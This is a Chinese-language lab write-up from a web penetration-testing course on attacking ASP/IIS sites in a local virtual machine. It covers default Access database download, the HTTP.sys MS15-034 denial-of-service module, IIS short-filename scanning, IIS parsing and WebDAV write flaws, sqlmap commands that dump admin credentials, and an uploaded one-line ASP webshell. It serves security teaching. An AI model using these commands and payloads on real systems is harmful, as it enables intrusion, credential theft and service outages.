041-WEB攻防-ASP應用&HTTP.SYS&短文件&文件解析&Access注入&數(shù)據(jù)庫泄漏

#知識點：

1、ASP-SQL注入-Access數(shù)據(jù)庫
2、ASP-默認安裝-數(shù)據(jù)庫泄漏下載
3、ASP-IIS-CVE&短文件&解析&寫入

演示案例：

?ASP-默認安裝-MDB數(shù)據(jù)庫泄漏下載
?ASP-中間件-CVE&短文件&解析&寫權限
?ASP-SQL注入-SQLMAP使用&ACCESS注入

#ASP-默認安裝-MDB數(shù)據(jù)庫泄漏下載

• 由于大部分ASP程序與ACCESS數(shù)據(jù)庫搭建，但ACCESS無需連接
• 在==腳本文件中定義配置好數(shù)據(jù)庫路徑即用，不需要額外配置安裝數(shù)據(jù)庫==
• 提前固定好的數(shù)據(jù)庫路徑如默認未修改，
• 當攻擊者知道數(shù)據(jù)庫的完整路徑，可遠程下載后解密數(shù)據(jù)實現(xiàn)攻擊。

1，打開虛擬機環(huán)境2003 企業(yè)版 32位 IIS 6.0 CN

2，右鍵我的電腦打開管理，選擇Internet信息服務（IIS）→網(wǎng)站

3，選擇對應的fyblogs_3.0 網(wǎng)站，查看分配的ip地址

4，通過其他主機訪問該IP地址

5，成功訪問后，通過訪問對應下載路徑，直接下載`#data.mdb文件

http://192.168.200.140:81**/database/%23data.mdb**

6，打開文件，發(fā)現(xiàn)其中==泄露用戶名密碼==等信息

遇到問題：打開網(wǎng)址不能在正常打開

解決：將屬性中的ip地址重新分配即可

#ASP-中間件-CVE&短文件&解析&寫權限

HTTP.SYS（CVE-2015-1635）

1、漏洞描述

遠程執(zhí)行代碼漏洞存在于 HTTP 協(xié)議堆棧 (HTTP.sys) 中，當 HTTP.sys 未正確分析經(jīng)特殊設計的 HTTP 請求時會導致此漏洞。 成功利用此漏洞的攻擊者可以在系統(tǒng)帳戶的上下文中執(zhí)行任意代碼。

2、影響版本

Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2

3、漏洞利用條件

安裝了IIS6.0以上的Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2版本

4、漏洞復現(xiàn)

• msfconsole

  是==Metasploit Framework的命令行界面==，它是一個功能強大的滲透測試工具和漏洞利用框架。Metasploit Framework旨在幫助安全專業(yè)人員評估和測試計算機系統(tǒng)的安全性，包括發(fā)現(xiàn)漏洞、開發(fā)和執(zhí)行攻擊、獲取遠程訪問權限等。

• use auxiliary/dos/http/ms15_034_ulonglongadd

  是Metasploit Framework中的一個輔助模塊，用于執(zhí)行針對MS15-034漏洞（也稱為HTTP.sys遠程代碼執(zhí)行漏洞）的拒絕服務（DoS）攻擊。這個漏洞影響Windows操作系統(tǒng)中的HTTP堆棧，攻擊者可以通過發(fā)送特制的HTTP請求導致**目標系統(tǒng)崩潰，從而實現(xiàn)拒絕服務攻擊。**

• set rhosts xx.xx.xx.xx
  set rport xx
  run

IIS短文件

1、漏洞描述

此漏洞實際是由HTTP請求中舊DOS 8.3名稱約定(SFN)的代字符(~)波浪號引起的。它允許遠程攻擊者在Web根目錄下公開文件和文件夾名稱(不應該可被訪問)。攻擊者可以找到通常無法從外部直接訪問的重要文件,并獲取有關應用程序基礎結構的信息。

2、漏洞成因:

為了兼容16位MS-DOS程序,Windows為文件名較長的文件(和文件夾)生成了對應的windows 8.3短文件名。在Windows下查看對應的短文件名,可以使用命令**dir /x**

3、應用場景：

后臺路徑獲取，數(shù)據(jù)庫文件獲取，其他敏感文件獲取等

python iis_shortname_scan.py [http://192.168.200.140:88/](http://192.168.200.140:88/)

• 選擇對應的powereasy 網(wǎng)站，查看分配的ip地址
• 借助工具，輸入執(zhí)行語句和目標ip執(zhí)行掃描
• 獲取到對應的網(wǎng)站目錄

4、利用工具：

https://github.com/lijiejie/IIS_shortname_Scanner

IIS文件解析

• IIS 6 解析漏洞→可以上傳木馬文件，以圖片形式或文件夾形式替換格式

  • 1、該版本默認會將***.asp;.jpg** 此種格式的文件名，當成Asp解析

    

    

  

  • 2、該版本默認會將***.asp/目錄下的所有文件當成Asp解析**。
    如：logo.asp;.jpg xx.asp/logo.jpg

    

  

  

• IIS 7.x 解析漏洞

  • 在一個文件路徑(/xx.jpg)后面加上/xx.php會將/xx.jpg/xx.php 解析為php文件
    應用場景：配合文件上傳獲取Webshell

IIS寫權限

• IIS<=6.0 目錄權限開啟寫入，開啟WebDAV，設置為允許
• 可以通過提交put包，進行寫入文件（可置入木馬，獲得權限）
  參考利用：https://cloud.tencent.com/developer/article/2050105

#ASP-SQL注入-SQLMAP使用&ACCESS注入

1. ACCESS數(shù)據(jù)庫無管理帳號密碼，頂級架構為表名，列名（字段），數(shù)據(jù)，
2. 所以在注入猜解中一般采用字典猜解表和列再獲取數(shù)據(jù)，猜解簡單但又可能出現(xiàn)猜解不到的情況
3. Access數(shù)據(jù)庫在當前安全發(fā)展中已很少存在，故直接使用SQLMAP注入，后續(xù)再說其他。

1.打開對應的UploadParsing網(wǎng)址，并使用其分配的IP進行訪問

2.源碼中，沒有進行sql語句的過濾，直接拼接，造成有注入風險

• http://192.168.200.140:89**/Pic.asp?classid=3**

  

3.使用sqlmap工具進行sql注入

• G:\develop\safety\ONE-FOX集成工具箱_V3.0魔改版_by狐貍\gui_scan\sqlmap

• python sqlmap.py -u “” --tables //獲取表名
  python sqlmap.py -u “” --cloumns -T admin //獲取admin表名下的列名
  python sqlmap.py -u “” --dump -C “username,password” -T admin //獲取表名下的列名數(shù)據(jù)

• python .\sqlmap.py -u “http://192.168.200.140:89/Pic.asp?classid=3” --tables

  • python .\\sqlmap.py: 啟動 SQLMap 工具，使用 Python 解釋器運行。

  • u "<http://192.168.200.140:89/Pic.asp?classid=3>": 指定目標 URL，即要測試的網(wǎng)站地址。在這個例子中，目標 URL 是 http://192.168.200.140:89/Pic.asp?classid=3。u 選項用于指定 URL。

  • -tables: 指定 SQLMap 工具執(zhí)行的任務，這里是獲取數(shù)據(jù)庫中的所有表。-tables 選項用于請求表的信息。

  • 提示有注入點

    

• 它詢問是否要使用常見的表存在性檢查方法

  • do you want to use common table existence check? [Y/n/q] y

  • 選擇要使用的常見表文件的提示。用戶可以選擇默認的常見表文件，也可以選擇自定義的常見表文件。

  • 詢問用戶要設置多少個線程進行測試

  • please enter number of threads? [Enter for 1 (current)] 輸入10

    

• python .[sqlmap.py](http://sqlmap.py/) -u “http://192.168.200.140:89/Pic.asp?classid=3” --columns -T admin

  • -columns: 這是 SQLMap 的一個選項，用于指示工具查找指定表的列。

  • T admin: 這是 SQLMap 的另一個選項，用于指定目標表的名稱。在這里，它是 “admin” 表。

    

    

• python .[sqlmap.py](http://sqlmap.py/) -u “http://192.168.200.140:89/Pic.asp?classid=3” --dump -C “username,password” -T admin

  • -dump: 這是 SQLMap 的選項，用于指示工具從數(shù)據(jù)庫中檢索數(shù)據(jù)。

  • C "username,password": 這是 SQLMap 的選項，用于指定要檢索的列的名稱。在這里，它是 “username” 和 “password” 列。

  • 得出如下的用戶名和密碼

    

• 由于密碼是MD5加密的

  使用解密解密出密碼

  

  

4.使用IIS短目錄或**目錄掃描（7kbscan御劍版）**掃描找到后臺登錄頁面

• python iis_shortname_scan.py http://192.168.200.140:89/

  • 掃描出一些目錄

  • 一一進行訪問在訪問時發(fā)現(xiàn)：http://192.168.200.140:89/upfile.asp

  • 會跳轉到后臺登錄頁面：http://192.168.200.140:89**/Tcnet/Admin_Login.asp**

    

    

    

• 目錄掃描（7kbscan御劍版）

  • 直接將目標地址寫入

  • 選擇對應的字典類型和顯示結果

  • 發(fā)現(xiàn)有跳轉的頁面直接訪問至后臺

    

    

• 網(wǎng)站爬蟲

  • 直接在網(wǎng)址檢測中點擊文件，查看目錄和文件結構
  • 直接查看網(wǎng)站前端源碼

5.登錄后臺頁面

6.模擬漏洞上傳測試（只需要了解后面還會講）

• 分別開啟burp和瀏覽器的代理和端口

  

  

• 上傳普通的小的照片

  

  

  

  

• 進行抓包，將包中的有關文件路徑的內容，拼接上去**/1.asp;.(可以將木馬文件，替換為該格式)**

• 再次抓包

  

  

  

• 將照片路徑替換為：192.168.126.131:89**/1.asp;.20235192154599715.png**

  • 發(fā)現(xiàn)可以被當成Asp正常解析

  • 在抓包的后面加上木馬程序的內容**<%eval request(”passs”)%>**

    1. <% 和 %>: 這是ASP腳本中的定界符，用于標識服務器端代碼的開始和結束。
    2. eval: 這是一個函數(shù)或操作符，用于執(zhí)行動態(tài)生成的代碼。在這里，它被用于執(zhí)行后面括號中的內容。
    3. request("passs"): 這部分看起來是從請求中獲取名為 “passs” 的參數(shù)的值。request 是用于獲取請求參數(shù)的對象，而 “passs” 是參數(shù)的名稱。

    總體來說，這段代碼的作用是從請求中獲取名為 “passs” 的參數(shù)的值，并使用 eval 函數(shù)執(zhí)行它。這種構造可能導致安全風險，特別是如果用戶能夠控制傳遞給 “passs” 參數(shù)的內容。eval 的使用通常被認為是不安全的，因為它允許執(zhí)行任意的動態(tài)代碼，可能導致代碼注入攻擊。

  • 使用哥斯拉，利用木馬文件獲得權限成功

    

    

    

    文章來源地址http://www.zghlxwxcb.cn/news/detail-850054.html

到了這里，關于041-WEB攻防-ASP應用&HTTP.SYS&短文件&文件解析&Access注入&數(shù)據(jù)庫泄漏的文章就介紹完了。如果您還想了解更多內容，請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關文章，希望大家以后多多支持TOY模板網(wǎng)！